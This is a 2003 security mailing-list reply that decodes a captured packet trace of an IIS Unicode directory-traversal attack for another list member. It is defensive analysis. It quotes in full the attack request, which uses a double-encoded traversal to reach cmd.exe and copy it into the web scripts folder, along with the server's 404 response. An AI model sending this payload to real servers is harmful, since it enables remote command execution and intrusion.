-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 If you put the dump into ethereal and trace the TCP stream you can see what's going on a bit better. The top 3 lines are the request and the following ones are the reply. (I would color code it like Ethereal does but this MTA doesn't seem to support it. :-P ). Anyway... here is the decoded stream for those interested. It looks like this is an attack on the Unicode bug. cmd.exe is being asked to copy cmd.exe over top of script.exe. The google URL probably appears because HTTP/1.1 GET requests MUST have a host name specified either in the GET line or using the Host field (as shown below). Ok, enough of me, here is the trace: GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe HTTP/1.1 Host: www.google.com Connection: keep-alive HTTP/1.1 404 Not Found Date: Sun, 13 Jul 2003 05:07:00 GMT Server: Apache/1.3.27 (Unix) Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 137 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1>Not Found</H1> The requested URL /scripts/..%5c..%5cwinnt/system32/cmd.exe was not found on this server.<P> <HR> <ADDRESS>Apache/1.3.27 Server at dimension.lannet.com Port 80</ADDRESS> </BODY></HTML> 0 Sam On Monday 14 July 2003 13:35, sgt_b wrote: > I've included a link to a tcpdump taken that shows a standard IIS > directory-traversal attack. I was looking over the packets and noticed a > reference to www.google.com. Could someone take a look, and let me know > what this is being used for? > > http://12.208.102.165/attack3.dump > atack3.dump=1.6kb > > Thanks! > > --------------------------------------------------------------------------- >- Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the > world's premier technical IT security event! 10 tracks, 15 training > sessions, 1,800 delegates from 30 nations including all of the top experts, > from CSO's to "underground" security specialists. See for yourself what > the buzz is about! Early-bird registration ends July 3. This event will > sell out. www.blackhat.com > --------------------------------------------------------------------------- >- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE/E+bEuabcSIn58XwRArH5AJ4nNK288Y+3gDW02BzPewOt/iWr0ACcDmk5 gHKbLLSPY24OoX0jEd5IOrk= =SHAM -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the world's premier technical IT security event! 10 tracks, 15 training sessions, 1,800 delegates from 30 nations including all of the top experts, from CSO's to "underground" security specialists. See for yourself what the buzz is about! Early-bird registration ends July 3. This event will sell out. www.blackhat.com ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Jul 15 2003 - 11:01:15 PDT